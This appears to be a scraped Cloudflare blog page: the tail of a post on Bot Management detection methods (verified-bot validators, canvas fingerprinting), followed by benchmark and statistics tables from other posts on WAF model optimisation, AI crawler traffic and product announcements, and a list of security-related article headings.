Validator based approach - we support multiple validation mechanisms, each of them allowing us to reliably confirm good bot identity by clustering a set of IPs.
Reverse DNS validator - performs a reverse DNS check to determine whether or not a bots IP address matches its alleged hostname.
ASN Block validator - similar to rDNS check, but performed on ASN block.
Downloader validator - collects good bot IPs from either text files or HTML pages hosted on bot owner sites.
Machine learning validator - uses an unsupervised learning algorithm, clustering good bot IPs which are not possible to validate through other means.
Bots Directory - a database with UI that stores and manages bots that pass through the Cloudflare network.
            
            
            
            
            
Bots directory UI sample‌‌
Using multiple validation methods listed above, the Verified Bots detection mechanism identifies hundreds of unique good bot identities, belonging to different companies and categories.
    
      JS fingerprinting
      
        
      
    
    When it comes to Bot Management detection quality it’s all about the signal quality and quantity. All previously described detections use request attributes sent over the network and analyzed on the server side using different techniques. Are there more signals available, which can be extracted from the client to improve our detections?
As a matter of fact there are plenty, as every browser has unique implementation quirks. Every web browser graphics output such as canvas depends on multiple layers such as hardware (GPU) and software (drivers, operating system rendering). This highly unique output allows precise differentiation between different browser/device types. Moreover, this is achievable without sacrificing website visitor privacy as it’s not a supercookie, and it cannot be used to track and identify individual users, but only to confirm that request’s user agent matches other telemetry gathered through browser canvas API.
This detection mechanism is implemented as a challenge-response system with challenge injected into the webpage on Cloudflare’s edge. The challenge is then rendered in the background using provided graphic instructions and the result sent back to Cloudflare for validation and further action such as  producing the score. There is a lot going on behind the scenes to make sure we get reliable results without sacrificing users’ privacy while being tamper resistant to replay attacks. The system is currently in private beta and being evaluated for its effectiveness and we already see very promising results. Stay tuned for this new detection mechanism becoming widely available and the blog on how we’ve built it.
This concludes an overview of the five detection mechanisms we’ve built so far. It’s time to sum it all up!
    
      Summary
      
        
      
    
    Cloudflare has the unique ability to collect data from trillions of requests flowing through its network every week. With this data, Cloudflare is able to identify likely bot activity with Machine Learning, Heuristics, Behavioral Analysis, and other detection mechanisms. Cloudflare Bot Management integrates seamlessly with other Cloudflare products, such as WAF  and Workers.
            
            
            
            
            
All this could not be possible without hard work across multiple teams! First of all thanks to everybody on the Bots Team for their tremendous efforts to make this platform come to life. Other Cloudflare teams, most notably: Firewall, Data, Solutions Engineering, Performance, SRE, helped us a lot to design, build and support this incredible platform.
            
            
            
            
            
Bots team during Austin team summit 2019 hunting bots with axes :)
Lastly, there are more blogs from the Bots series coming soon, diving into internals of our detection mechanisms, so stay tuned for more exciting stories about Cloudflare Bot Management!

Benchmark case	Pre-processing time, μs	Throughput, MiB/s
preprocessing/long-body-9482	248.46	36.40
preprocessing/avg-body-1000	28.19	33.83
preprocessing/avg-url-44	1.45	28.94
preprocessing/avg-ua-91	2.87	30.24

Function name	% Time spent
std::collections::hash::map::HashMap::get	61.8%
regex::regex::bytes::Regex::replace_all	18.5%

Benchmark case	Baseline time, μs	Aho-Corasick time, μs	Optimization
preprocessing/long-body-9482	248.46	129.59	-47.84% or 1.64x
preprocessing/avg-body-1000	28.19	16.47	-41.56% or 1.71x
preprocessing/avg-url-44	1.45	1.01	-30.38% or 1.44x
preprocessing/avg-ua-91	2.87	1.90	-33.60% or 1.51x

Benchmark case	Baseline time, μs	Match time, μs	Optimization
preprocessing/long-body-9482	248.46	112.96	-54.54% or 2.20x
preprocessing/avg-body-1000	28.19	13.12	-53.45% or 2.15x
preprocessing/avg-url-44	1.45	0.75	-48.37% or 1.94x
preprocessing/avg-ua-91	2.87	1.4076	-50.91% or 2.04x

Benchmark case	Baseline time, μs	Match time, μs	Optimization
preprocessing/long-body-9482	248.46	51.00	-79.47% or 4.87x
preprocessing/avg-body-1000	28.19	5.53	-80.36% or 5.09x
preprocessing/avg-url-44	1.45	0.40	-72.11% or 3.59x
preprocessing/avg-ua-91	2.87	0.69	-76.07% or 4.18x

Lookup method	Description
std::collections::HashMap	Uses Google’s SwissTable design with SIMD lookups to scan multiple hash entries in parallel.
Aho-Corasick matcher with and without DFA	Also utilizes SIMD instructions in some cases.
phf crate	A library to generate efficient lookup tables at compile time using perfect hash functions.
ph crate	Another Rust library of data structures based on perfect hashing.
quickphf crate	A Rust crate that allows you to use static compile-time generated hash maps and hash sets using PTHash perfect hash functions.

Benchmark case	Baseline time, μs	Branchless time, μs	Optimization
preprocessing/long-body-9482	248.46	21.53	-91.33% or 11.54x
preprocessing/avg-body-1000	28.19	2.33	-91.73% or 12.09x
preprocessing/avg-url-44	1.45	0.26	-82.34% or 5.66x
preprocessing/avg-ua-91	2.87	0.43	-84.92% or 6.63x

Benchmark case	Inference time, μs
inference/long-body-9482	247.31
inference/avg-body-1000	246.31
inference/avg-url-44	246.40
inference/avg-ua-91	246.88

Function name	% Time spent
tflite::tensor_utils::PortableMatrixBatchVectorMultiplyAccumulate	42.46%
tflite::tensor_utils::PortableAsymmetricQuantizeFloats	30.59%
tflite::optimized_ops::SoftmaxImpl	12.02%
tflite::reference_ops::MaximumMinimumBroadcastSlow	5.35%
tflite::ops::builtin::elementwise::LogEval	4.13%

Function name	% Time spent
tflite::tensor_utils::SseMatrixBatchVectorMultiplyAccumulateImpl	43.01%
tflite::tensor_utils::NeonAsymmetricQuantizeFloats	22.46%
tflite::reference_ops::MaximumMinimumBroadcastSlow	7.82%
tflite::optimized_ops::SoftmaxImpl	6.61%
tflite::ops::builtin::elementwise::LogEval	4.63%

Benchmark run	Inference time, μs
benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=false	105.61
benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true --xnnpack_force_fp16=true	111.95
benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true	49.05

AI Bot	Share of Websites Accessed
Bytespider	40.40%
GPTBot	35.46%
ClaudeBot	11.17%
ImagesiftBot	8.75%
CCBot	2.14%
ChatGPT-User	1.84%
omgili	0.10%
Diffbot	0.08%
Claude-Web	0.04%
PerplexityBot	0.01%

Top N Internet properties by number of visitors seen by Cloudflare	% accessed by AI bots	% blocking AI bots
10	80.0%	40.0%
100	63.0%	16.0%
1,000	53.2%	8.8%
10,000	47.99%	8.92%
100,000	44.53%	6.36%
1,000,000	38.73%	2.98%

What	In a sentence…
Switching to Cloudflare can cut emissions by up to 96%	Switching enterprise network services from on-prem to Cloudflare can cut related carbon emissions by up to 96%.
Cloudflare Trace	Use Cloudflare Trace to see which rules and settings are invoked when an HTTP request for your site goes through our network.
Cloudflare Fonts	Introducing Cloudflare Fonts. Enhance privacy and performance for websites using Google Fonts by loading fonts directly from the Cloudflare network.
How Cloudflare intelligently routes traffic	Technical deep dive that explains how Cloudflare uses machine learning to intelligently route traffic through our vast network.
Low Latency Live Streaming	Cloudflare Stream’s LL-HLS support is now in open beta. You can deliver video to your audience faster, reducing the latency a viewer may experience on their player to as little as 3 seconds.
Account permissions for all	Cloudflare account permissions are now available to all customers, not just Enterprise. In addition, we’ll show you how you can use them and best practices.
Incident Alerts	Customers can subscribe to Cloudflare Incident Alerts and choose when to get notified based on affected products and level of impact.

What	In a sentence…
Welcome to the connectivity cloud	Cloudflare is the world’s first connectivity cloud — the modern way to connect and protect your cloud, networks, applications and users.
Amazon’s $2bn IPv4 tax — and how you can avoid paying it	Amazon will begin taxing their customers $43 for IPv4 addresses, so Cloudflare will give those \$43 back in the form of credits to bypass that tax.
Sippy	Minimize egress fees by using Sippy to incrementally migrate your data from AWS to R2.
Cloudflare Images	All Image Resizing features will be available under Cloudflare Images and we’re simplifying pricing to make it more predictable and reliable.
Traffic anomalies and notifications with Cloudflare Radar	Cloudflare Radar will be publishing anomalous traffic events for countries and Autonomous Systems (ASes).
Detecting Internet outages	Deep dive into how Cloudflare detects Internet outages, the challenges that come with it, and our approach to overcome these problems.

What	In a sentence…
The best place on Region: Earth for inference	Now available: Workers AI, a serverless GPU cloud for AI, Vectorize so you can build your own vector databases, and AI Gateway to help manage costs and observability of your AI applications. Cloudflare delivers the best infrastructure for next-gen AI applications, supported by partnerships with NVIDIA, Microsoft, Hugging Face, Databricks, and Meta.
Workers AI	Launching Workers AI — AI inference as a service platform, empowering developers to run AI models with just a few lines of code, all powered by our global network of GPUs.
Partnering with Hugging Face	Cloudflare is partnering with Hugging Face to make AI models more accessible and affordable to users.
Vectorize	Cloudflare’s vector database, designed to allow engineers to build full-stack, AI-powered applications entirely on Cloudflare's global network — available in Beta.
AI Gateway	AI Gateway helps developers have greater control and visibility in their AI apps, so that you can focus on building without worrying about observability, reliability, and scaling. AI Gateway handles the things that nearly all AI applications need, saving you engineering time so you can focus on what you're building.
You can now use WebGPU in Cloudflare Workers	Developers can now use WebGPU in Cloudflare Workers. Learn more about why WebGPUs are important, why we’re offering them to customers, and what’s next.
What AI companies are building with Cloudflare	Many AI companies are using Cloudflare to build next generation applications. Learn more about what they’re building and how Cloudflare is helping them on their journey.
Writing poems using LLama 2 on Workers AI	Want to write a poem using AI? Learn how to run your own AI chatbot in 14 lines of code, running on Cloudflare’s global network.

What	In a sentence…
Hyperdrive	Cloudflare launches a new product, Hyperdrive, that makes existing regional databases much faster by dramatically speeding up queries that are made from Cloudflare Workers.
D1 Open Beta	D1 is now in open beta, and the theme is “scale”: with higher per-database storage limits and the ability to create more databases, we’re unlocking the ability for developers to build production-scale applications on D1.
Pages Build Caching	Build cache is a feature designed to reduce your build times by caching and reusing previously computed project components — now available in Beta.
Running serverless Puppeteer with Workers and Durable Objects	Introducing the Browser Rendering API, which enables developers to utilize the Puppeteer browser automation library within Workers, eliminating the need for serverless browser automation system setup and maintenance
Cloudflare partners with Microsoft to power their Edge Secure Network	We partnered with Microsoft Edge to provide a fast and secure VPN, right in the browser. Users don’t have to install anything new or understand complex concepts to get the latest in network-level privacy: Edge Secure Network VPN is available on the latest consumer version of Microsoft Edge in most markets, and automatically comes with 5GB of data.
Re-introducing the Cloudflare Workers playground	We are revamping the playground that demonstrates the power of Workers, along with new development tooling, and the ability to share your playground code and deploy instantly to Cloudflare’s global network
Cloudflare integrations marketplace expands	Introducing the newest additions to Cloudflare’s Integration Marketplace. Now available: Sentry, Momento and Turso.
A Socket API that works across Javascript runtimes — announcing WinterCG spec and polyfill for connect()	Engineers from Cloudflare and Vercel have published a draft specification of the connect() sockets API for review by the community, along with a Node.js compatible polyfill for the connect() API that developers can start using.
New Workers pricing	Announcing new pricing for Cloudflare Workers, where you are billed based on CPU time, and never for the idle time that your Worker spends waiting on network requests and other I/O.

What	In a sentence…
Post Quantum Cryptography goes GA	Cloudflare is rolling out post-quantum cryptography support to customers, services, and internal systems to proactively protect against advanced attacks.
Encrypted Client Hello	Announcing a contribution that helps improve privacy for everyone on the Internet. Encrypted Client Hello, a new standard that prevents networks from snooping on which websites a user is visiting, is now available on all Cloudflare plans.
Email Retro Scan	Cloudflare customers can now scan messages within their Office 365 Inboxes for threats. The Retro Scan will let you look back seven days to see what threats your current email security tool has missed.
Turnstile is Generally Available	Turnstile, Cloudflare’s CAPTCHA replacement, is now generally available and available for free to everyone and includes unlimited use.
AI crawler bots	Any Cloudflare user, on any plan, can choose specific categories of bots that they want to allow or block, including AI crawlers. We are also recommending a new standard to robots.txt that will make it easier for websites to clearly direct how AI bots can and can’t crawl.
Detecting zero-days before zero-day	Deep dive into Cloudflare’s approach and ongoing research into detecting novel web attack vectors in our WAF before they are seen by a security researcher.
Privacy Preserving Metrics	Deep dive into the fundamental concepts behind the Distributed Aggregation Protocol (DAP) protocol with examples on how we’ve implemented it into Daphne, our open source aggregator server.
Post-quantum cryptography to origin	We are rolling out post-quantum cryptography support for outbound connections to origins and Cloudflare Workers fetch() calls. Learn more about what we enabled, how we rolled it out in a safe manner, and how you can add support to your origin server today.
Network performance update	Cloudflare’s updated benchmark results regarding network performance plus a dive into the tools and processes that we use to monitor and improve our network performance.

IPC method	Avg duration, μs	Avg throughput, msg/s
eventfd (bi-directional)	9.456	105,533
TCP sockets	8.74	114,143
Unix domain sockets	5.609	177,573
FIFOs (named pipes)	5.432	183,388
Pipe	4.733	210,369
Message Queue	4.396	226,421
Unix Signals	2.45	404,844
Shared Memory	0.598	1,616,014
Memory-Mapped Files	0.503	1,908,613

Latency metric	Before (μs)	After (μs)	Change
p50	532	9	-98.30% or x59
p99	9510	18	-99.81% or x528
p999	16000	29	-99.82% or x551

The Cloudflare Blog

Cloudflare Client-Side Security: smarter detection, now open to everyone

How Cloudflare Client-Side Security works

Detecting malicious intent JavaScripts

The high cost of false positives

Adding an LLM-based second opinion for triage

Catching zero-days in the wild: The core.js router exploit

Indicators of Compromise (IOCs)

Domain-based threat intelligence free for all

Get started with Client-Side Security Advanced for PCI DSS v4

Improved Bot Management flexibility and visibility with new high-precision heuristics

Bot detection via simple heuristics

The need for more efficient, precise rules

Our new heuristics engine

New visibility and flexibility for Bot Management customers

Account takeover detection IDs

Protect your applications

Trapping misbehaving bots in an AI Labyrinth

Using Generative AI as a defensive weapon

How we built the labyrinth

How to use AI Labyrinth to stop AI crawlers

AI honeypots, created by AI

What’s next

How we train AI to uncover malicious JavaScript intent and make web surfing safer

Training the model to detect hidden malicious intent

Using syntax trees to classify malicious code

Architecting the Graph Neural Network

Tackling unbalanced data: malicious scripts are the minority

Learning key scripts only: reduce false positives with minimal annotation time

From the lab, to the real world

Evaluate metrics uncertainty

Benchmark against massive offline unlabeled dataset

Review in staging and shadow mode

AI inference at scale

Let AI help ease PCI DSS v4 compliance

Training a million models per day to save customers of all sizes from DDoS attacks

A naive volumetric model

Time series forecasting

A better way?

How we train ~1 million models daily to keep customers safe

Join us!

AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection

AI Assistant for WAF Rule Builder

AI bot traffic insights on Cloudflare Radar

Blocking more AI bots

Enabling dynamic updates for the AI bot rule

The impact of new fingerprints on the model

Bot behavior

Wrap up

Making WAF ML models go brrr: saving decades of processing time

WAF Attack Score system design

Feature extraction optimizations

Initial benchmarks

Optimization attempt #1: HashMap → Aho-Corasick

Optimization attempt #2: Aho-Corasick → match

Optimization attempt #3: Regex → WindowedReplacer

Optimization attempt #4: Going nuclear with branchless ngram lookups

Model inference optimizations

Initial benchmarks

Tensorflow Lite with AVX2

Tensorflow Lite with XNNPACK

Caching inference result

Optimization results

Conclusion

Declare your AIndependence: block AI bots, scrapers and crawlers with a single click

AI bot activity today

How we find AI bots pretending to be real web browsers

Using machine learning to detect bot attacks that leverage residential proxies

Background

Residential IP proxies

ML model training

ML features for bot detection

Detecting residential proxies using network and behavioral signals

Detection results and case studies

Improving detection for bots from cloud providers

Check out ML v8

Defensive AI: Cloudflare’s framework for defending against next-gen threats

Protecting APIs with anomaly detection

Identifying unknown application vulnerabilities

Using AI to fight phishing

Catching zero-days in the wild: The `core.js` router exploit